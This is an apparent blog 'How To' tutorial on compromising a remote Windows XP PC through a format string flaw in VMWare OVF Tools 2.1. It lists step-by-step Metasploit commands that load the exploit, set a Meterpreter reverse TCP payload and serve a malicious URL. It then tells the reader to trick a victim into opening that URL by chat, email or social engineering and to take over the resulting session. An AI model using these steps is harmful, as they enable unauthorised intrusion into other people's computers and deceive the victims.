How To

Hack Remote Windows PC using VMWare OVF Tools Format String Vulnerability

This module exploits format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Exploit Targets

VMWare OVF Tools 2.1


Attacker: Backtrack 5

Victim PC: Windows XP SP 2

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ovftool_format_string

msf exploit (ovftool_format_string)>set payload windows/meterpreter/reverse_tcp

msf exploit (ovftool_format_string)>set lhost (IP of Local Host)

msf exploit (ovftool_format_string)>set srvhost (This must be an address on the local machine)

msf exploit (ovftool_format_string)>set uripath / (The Url to use for this exploit)

msf exploit (ovftool_format_string)>exploit

Now an URL you should give to your victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Related Posts Plugin for WordPress, Blogger...

You Might Also Like